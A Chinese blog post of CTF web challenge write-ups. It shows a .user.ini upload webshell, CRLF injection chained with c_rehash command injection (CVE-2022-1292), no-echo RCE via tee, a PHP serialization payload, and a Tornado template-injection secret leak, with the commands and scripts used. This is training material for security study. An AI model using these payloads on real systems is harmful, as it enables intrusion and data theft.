NSSCTF第14页(1)

最新推荐文章于 2023-12-17 11:54:58 发布
最新推荐文章于 2023-12-17 11:54:58 发布
阅读量172 收藏
点赞数
文章标签: 做题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwwyyyrre/article/details/134687460
版权

[suctf 2019]checkin

利用了几种方式,发现都不行

1是修改mime类型,2是修改php标签为js标签,3是修改文件后缀

在试试用配置文件来上传

发现上传.user.ini文件成功

发现上传成功

上传的png图片

 访问上传路径发现可以访问,上马成功

ls /

cat /flag

[CISCN 2022 初赛]online_crt 

看标签是一个cve漏洞

CVE-2022-1292的分析 - 先知社区

扫后台扫出来一个网页

[CISCN 2022 初赛]online_crt__rev1ve的博客-CSDN博客

 给了源码附件

app.py源码

import datetime
import json
import os
import socket
import uuid
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID
from flask import Flask
from flask import render_template
from flask import request

app = Flask(__name__)

app.config['SECRET_KEY'] = os.urandom(16)

def get_crt(Country, Province, City, OrganizationalName, CommonName, EmailAddress):
    root_key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
    )
    subject = issuer = x509.Name([
        x509.NameAttribute(NameOID.COUNTRY_NAME, Country),
        x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, Province),
        x509.NameAttribute(NameOID.LOCALITY_NAME, City),
        x509.NameAttribute(NameOID.ORGANIZATION_NAME, OrganizationalName),
        x509.NameAttribute(NameOID.COMMON_NAME, CommonName),
        x509.NameAttribute(NameOID.EMAIL_ADDRESS, EmailAddress),
    ])
    root_cert = x509.CertificateBuilder().subject_name(
        subject
    ).issuer_name(
        issuer
    ).public_key(
        root_key.public_key()
    ).serial_number(
        x509.random_serial_number()
    ).not_valid_before(
        datetime.datetime.utcnow()
    ).not_valid_after(
        datetime.datetime.utcnow() + datetime.timedelta(days=3650)
    ).sign(root_key, hashes.SHA256(), default_backend())
    crt_name = "static/crt/" + str(uuid.uuid4()) + ".crt"
    with open(crt_name, "wb") as f:
        f.write(root_cert.public_bytes(serialization.Encoding.PEM))
    return crt_name


@app.route('/', methods=['GET', 'POST'])
def index():
    return render_template("index.html")


@app.route('
', methods=['GET', 'POST'])
def upload():
    Country = request.form.get("Country", "CN")
    Province = request.form.get("Province", "a")
    City = request.form.get("City", "a")
    OrganizationalName = request.form.get("OrganizationalName", "a")
    CommonName = request.form.get("CommonName", "a")
    EmailAddress = request.form.get("EmailAddress", "a")
    return get_crt(Country, Province, City, OrganizationalName, CommonName, EmailAddress)


@app.route('/createlink', methods=['GET'])
def info():
    json_data = {"info": os.popen("c_rehash static/crt/ && ls static/crt/").read()}
    return json.dumps(json_data)


@app.route('/proxy', methods=['GET'])
def proxy():
    uri = request.form.get("uri", "/")
    client = socket.socket()
    client.connect(('localhost', 8887))
    msg = f'''GET {uri} HTTP/1.1
Host: test_api_host
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

'''
    client.send(msg.encode())
    data = client.recv(2048)
    client.close()
    return data.decode()

app.run(host="0.0.0.0", port=8888)

gpt的解释

此代码似乎是定义 Flask Web 应用程序的 Python 脚本。让我们来看看主要组件及其功能:

  1. 导入语句:该脚本导入其功能所需的多个模块和包,包括 、 、 、 、 和 。datetimejsonossocketuuidcryptographyFlask

  2. Flask 应用程序设置:使用 创建 Flask 应用程序的实例,并使用 设置应用程序的密钥。Flask(__name__)app.config['SECRET_KEY']

  3. get_crt函数:此函数根据提供的输入参数生成 X.509 证书(SSL/TLS 证书)。它使用该库生成私钥、生成证书并将其保存到文件中。返回生成的证书的文件路径。cryptography

  4. 路由定义:

    • '/':此路由与应用程序的根 URL 相关联。它使用 呈现名为“index.html”的 HTML 模板。render_template
    • '/getcrt':此路由与 URL 路径“/getcrt”相关联,并接受 GET 和 POST 请求。它从请求(国家/地区、省、市、组织名称、公用名、电子邮件地址)中检索表单数据,并使用提供的数据调用函数。然后,将 的返回值作为响应返回。get_crtget_crt
    • '/createlink':此路由与 URL 路径“/createlink”相关联,并接受 GET 请求。它会生成一个 JSON 响应,其中包含有关“static/crt/”目录中生成的证书文件的信息。
    • '/proxy':此路由与 URL 路径“/proxy”相关联,并接受 GET 请求。它从请求中检索 URI 参数,并在端口 8887 上与 localhost 服务器建立套接字连接。它向指定的 URI 发送 HTTP GET 请求,并将接收到的数据作为响应返回。

  5. app.run():此方法启动 Flask 开发服务器,允许应用程序侦听所有网络接口 (host=“0.0.0.0”) 和端口 8888 上的传入请求。

总之,此脚本定义了一个 Flask Web 应用程序,该应用程序提供用于生成 X.509 证书、呈现 HTML 模板以及充当代理服务器以向指定 URI 发出 HTTP 请求的功能。

分析一下,采用的是flask模板,总计4个路由

    /根目录返回一个index.htmld的界面,也就是我们开题看到的界面
    /getcrt路由配合getcrt函数用来生成X509证书(了解一下就行,它会根据我们提交的信息创建一个.crt的证书文件,存入static/crt/目录下)
    /createlink路由,用来建立一个与我们刚才生成的.crt证书的链接,去访问它的内容
    /proxy路由,用来建立一个内网 8887端口的连接,与go源码部分进行对接,并将发送一段请求信息给go源码的部分进行处理

go源码

package main

import (

    "github.com/gin-gonic/gin"

    "os"

    "strings"

)

func admin(c *gin.Context) {

    staticPath := "/app/static/crt/"

    oldname := c.DefaultQuery("oldname", "")

    newname := c.DefaultQuery("newname", "")

    if oldname == "" || newname == "" || strings.Contains(oldname, "..") || strings.Contains(newname, "..") {

        c.String(500, "error")

        return

    }

    if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {

        err := os.Rename(staticPath+oldname, staticPath+newname)

        if err != nil {

            return

        }

        c.String(200, newname)

        return

    }

    c.String(200, "no")

}

func index(c *gin.Context) {

    c.String(200, "hello world")

}

func main() {

    router := gin.Default()

    router.GET("/", index)

    router.GET("/admin/rename", admin)

    if err := router.Run(":8887"); err != nil {

        panic(err)

    }

}

这一段代码比较重要的就是只要绕过if语句就可以修改我们指定的.crt后缀的证书文件名 

第一个判断直接将路径中的/替换为%2f即可通过,第二个要求HOST为admin 

本题漏洞
出在/createlink这个路由下的c_rehash指令,c_rehash是openssl中的一个用perl编写的脚本工具,用于批量创建证书等文件 hash命名的符号链接,是当用户可控文件名时的命令注入 

 在openssl中的c_rehash存在命令注入, 允许以c_reash脚本的权限执行命令

访问/getcrt生成一个证书 9eaf2906-aea8-4bf7-9d5f-14c266c18856.crt

 然后通过访问 /proxy路由来打通与内容 go源码业务部分的连接,修改我们的证书文件名,并加上我们的命令执行RCE
payload生效的内容是在同目录下生成一个flag.txt文件并向flag.txt文件写入我们 cat /*的结果

uri是被直接拼接进去的,因此存在CRLF漏洞,我们就可以篡改HOST为admin从而满足go server修改文件名的要求。

CRLF注入漏洞、URL重定向、资源处理拒绝服务详细介绍(附实例)_crlf漏洞_ranzi.的博客-CSDN博客

CRLF注入漏洞(响应截断)攻击实战_crlf漏洞_归去来兮-zangcc的博客-CSDN博客

访问/proxy,同时抓包修改请求方式为GET以及在uri参数后回车两次

抓get包,然后利用bp改成post,最后再手改为get请求,发送

访问/createlink路由,执行 c_rehash命令,进而触发命令执行,使payload生效

payload生效的内容是在同目录下生成一个flag.txt文件并向flag.txt文件写入我们 cat /*的结果

访问同目录static/crt/flag.txt 拿到flag信息 

[SWPUCTF 2023 秋季新生赛]RCE-PLUS 

题目提示是无回显的rce,之前做就是用tee命令写入文件

?cmd=ls / | tee 1.txt 

?cmd=cat /fl\ag | tee 1.txt 

 [CISCN 2023 华北]ez_date

代码审计

定义了公共变量a,b,file

a不等于b但是a,b的MD5和sha1值相等;如果为true,那么将file值传入date函数并赋值给变量content;使用 uniqid() 生成一个唯一的标识符,并将其与 .txt 扩展名拼接为文件名,赋值给变量 $uuid;最后就是进行正则匹配,读取文件 

preg_replace('/((\s)*(\n)+(\s)*)/i', '', $data):此函数对字符串执行正则表达式替换。使用的正则表达式模式是 ,它匹配空格字符和换行符的任意组合。替换参数是一个空字符串,这意味着匹配的模式将被替换为任何内容(即删除)。$data'/((\s)*(\n)+(\s)*)/i'''

<?php

class date{
    public $a;
    public $b;
    public $file;
}

$A=new date();
$A->a=1;
$A->b='1';
$A->file='/f\l\a\g';
echo base64_encode(serialize($A));
?>

得到flag

[护网杯 2018]easy_tornado 

点flag.txtc出现了flag的文件

hint.txt

welcome.txt

查了资料之后才想起来

Tornado模板注入 - 先知社区

tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。

url形如 :http://35848a5d-982a-45c9-a772-1b59e317746f.node3.buuoj.cn/file?filename=/flag.txt&filehash=32c8987c242bb2c5f0b0da175550dab6

根据提示应该payload应该是file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename)),因此现在需要找到cookie_secret

将filename替换为/fllllllllllllag 后发现报错,修改/error?msg=Error错误信息中的msg页面也跟着变
 

 根据render提示应该是模板注入,但存在过滤,ORZ

这里用到的是handler.setting对象

handler 指向RequestHandler
而RequestHandler.settings又指向self.application.settings
所有handler.settings就指向RequestHandler.application.settings

传递error?msg={{ handler.settings }}得到:

 得到secret后,就是计算访问flag文件的hash,获取flag

cookie_secret=eb535b6a-633c-4b3d-a321-8d1637396e1d

脚本:

import hashlib

s1=(hashlib.md5("/fllllllllllllag".encode())).hexdigest()
print((hashlib.md5(("eb535b6a-633c-4b3d-a321-8d1637396e1d"+s1).encode())).hexdigest())

得到hash值

访问flag文件,得到flag

呕...
关注
[NISACTF 2022]checkin
m0_60716947的博客
10-18 1247
010 editor使用
NSSCTF
weixin_43896504的博客
07-22 2813
NSSCTF
NSSCTF的一部分题的萌新的我的思路:MISC篇(持续更新)
超大青花鱼的博客
11-17 2344
第一次接触NSSCTF是在CTFHub上看到的HNCTF,于是顺藤摸瓜摸到了NSSCTF,于是看到了有题库,于是有了这篇文章,为什么要写这个前言呢,第一是我菜我思路不一定对也不一定好,第二是防剧透免得一上来就正文猝不及防。
NSSCTF第12(1)
wwwwyyyrre的博客
11-14 408
应该是和[HUBUCTF 2022 新生赛]ezsql搞混掉了点击按钮出现了发现输入什么回显什么伪协议也不行看源代码发现了这个玩意输入了1;发现了其他回显ls 发现了两个文件发现被限制了不知道是cat还是空格绕过直接找吧还是 得到flag。
NSSCTF14(3)
wwwwyyyrre的博客
12-07 135
题目提示说是无列名注入先进行fuzz测试过滤了很多东西information_schema 被过滤 -> 无列名注入order 被过滤 -> group 替换空格 -> /**/注释符 -> '1;%00判断回显位查数据库查表拿flag用无列名注入也可以用位或注入flag = ''count = 1data = {breakexit()count += 1。
NSSCTF14(2)
wwwwyyyrre的博客
11-30 481
传入data数据,用data数据初始化一个UUCTF类,然后将hacker替换成loveuu后进行反序列化,可以看到youwant类可以进行命令执行,所以整条Pop链:youwant_rce()->ouput_toString()->nothing_destruct()->UUCTF_wakeup(),入口为UUCTF的__wakeup函数,要将basedata的数据替换成Pop链的base64编码才能触发Pop链,现在可以控制的只有构造函数即name的数据。
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 3583
NSSCTF Pwn 第一到第二全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
NSSCTF第16(2)
wwwwyyyrre的博客
12-17 594
查看index.phpphpphpinfo();查看upload.phpphpecho "上传异常";else{");echo "ltj一眼就发现了phar";}else{echo $_FILES["file"]["name"] . " 文件已经存在";}else{echo "上传成功 ./upload/".$_FILES["file"]["name"];}else{echo "dky不喜欢这个文件 .".$extension;?
NSSCTF第13(2)
wwwwyyyrre的博客
11-19 494
提示?hint访问看到了源码可以用的是,一眼自增,要求长度小于等于120。这里难办的是过滤了,之前遇到的payload,但凡短一点的都有斜杠。$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;//长度118 $_GET[1]($_GET[2])payload:GET:/?
NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(REVERSE篇)
jameshuangchuan的博客
08-10 2756
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
Reverse - [NSSRound#2 Able]findxenny
st1cky的博客
04-17 886
睡前才猛然想起今天NSSCTF有比赛,来不及了 (╥╯^╰╥) 用IDA反编译,找关键字符串: 查看调用找到主函数 __int64 sub_140018C10() { char *v0; // rdi signed __int64 i; // rcx __int64 v2; // rax __int64 v3; // rax __int64 v4; // rax __int64 v5; // rax __int64 v6; // rax __int64 v7; // r.
2023年LitCTF web组wp
m0_74160536的博客
05-17 1250
1、导弹迷踪2、1zjs3、php是世界上最好的语言!!4、Ping5、我Flag呢?7、作业管理系统8、Vim yyds10、这是什么?SQL!注一下!11、Flag点击就送!12、就当无事发生13、彩蛋。
[BUUCTF]Pwn刷题记录
x0r
10-13 261
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
2023 年江苏省职业院校技能大赛(中职)网络搭建与应用赛项公开赛卷
Merrr丶凌乱的博客
10-13 771
2023 年江苏省职业院校技能大赛(中职)网络搭建与应用赛项公开赛卷
开题报告SpringBoot高校双创竞赛申报与路演管理系统.docx
11-02
毕业设计开题报告
开题报告SpringBoot电影订票系统.docx
11-02
毕业设计开题报告
Flask-0.11.tar.zip
11-02
Flask-0.11.tar.zip
开题报告SpringBoot公益服务平台.docx
最新发布
11-02
毕业设计开题报告
bp-tools-20.12
11-02
BP-Tools是一套通用的、功能强大的加解密工具,是EFTlab 公司开发的主要面向金融和智能卡的数据加解密和数据转换工具。
nssctf pwn
10-24
NSSCTF (National Security Service CTF) 是一种网络安全比赛,其中pwn (Payload Writing and Exploitation) 题目通常涉及漏洞利用和内存安全相关的挑战。在这样的竞赛中,参赛者需要找到程序中存在的安全漏洞,如缓冲区溢出、格式化字符串漏洞等,并编写exploit(exploitation的简称),即一段恶意代码,来控制程序流程,获取flag(通常是一种竞赛得分的关键标识符)。 Pwn题目通常包括以下几个步骤: 1. **分析**:研究提供的二进制文件或源码,确定可能存在哪些类型的漏洞。 2. **栈溢出**:如果存在堆栈溢出,尝试构造payload,使其覆盖返回地址并指向自身或有用的地址。 3. **RCE(Remote Code Execution)**:通过修改程序的行为执行任意代码,可能需要理解如何设置环境变量或系统调用来达到目的。 4. **权限提升**:一旦获得某种程度的控制权,可能会尝试寻找路径提升权限到root或其他有更高权限的用户。 5. **获取flag**:执行特定操作或触发特定条件后,通常会在某个内存位置发现flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值